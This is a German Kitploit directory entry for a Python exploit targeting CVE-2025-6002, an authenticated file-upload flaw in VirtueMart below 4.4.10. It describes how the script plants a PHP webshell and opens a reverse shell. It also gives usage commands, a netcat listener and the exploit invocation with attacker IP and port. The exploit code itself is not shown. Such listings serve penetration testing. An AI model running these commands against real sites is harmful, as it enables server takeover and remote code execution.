Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-6002 — Python-Exploit für CVE-2025-6002, der auf einen authentifizierten beliebigen Dateiupload in VirtueMart < 4.4.10 abzielt. Meldet sich an, lädt eine PHP-Webshell hoch und löst eine Reverse-Shell für Penetrationstests aus. | Kitploit
Tools/GitHubGitHub/schn1tzelme1ster/cve-2025-6002
Payload-GenerierungSchwachstellenanalyseExploitationShellcodeWebanwendungs-ExploitationPenetrationstests
GitHubschn1tzelme1ster/cve-2025-6002

CVE-2025-6002

Python-Exploit für CVE-2025-6002, der auf einen authentifizierten beliebigen Dateiupload in VirtueMart < 4.4.10 abzielt. Meldet sich an, lädt eine PHP-Webshell hoch und löst eine Reverse-Shell für Penetrationstests aus.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
vor 5 MonatenNoch nicht geprüft
Teilen

Exploit für CVE-2025-6002

Dieses Skript nutzt die authentifizierte Schwachstelle für beliebige Dateiuploads in VirtueMart < 4.4.10 (CVE-2025-6002) aus, die in diesem Blogbeitrag beschrieben ist: https://blog.blacklanternsecurity.com/p/doomla-zero-days

Dieses Skript meldet sich mit den angegebenen Anmeldedaten bei VirtueMart an, erstellt ein neues Produkt und lädt eine PHP-Webshell als Mediendatei hoch. Anschließend wird eine Reverse-Shell zur angegebenen IP/Port gestartet.

Parameter:

  • --url: Die VirtueMart-URL
  • --username: Admin-Benutzername
  • --password: Admin-Passwort
  • --remote-ip: IP-Adresse des Angreifershttps://github.com/schn1tzelme1ster/CVE-2025-6002/tree/main
  • --remote-port: Port des Angreifers

Verwendung:

  1. Netcat auf der Angreifer-Maschine ausführen:
root@kitploit:~
nc -nlvp 1337
  1. Den Exploit ausführen
root@kitploit:~
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337
Tool herunterladen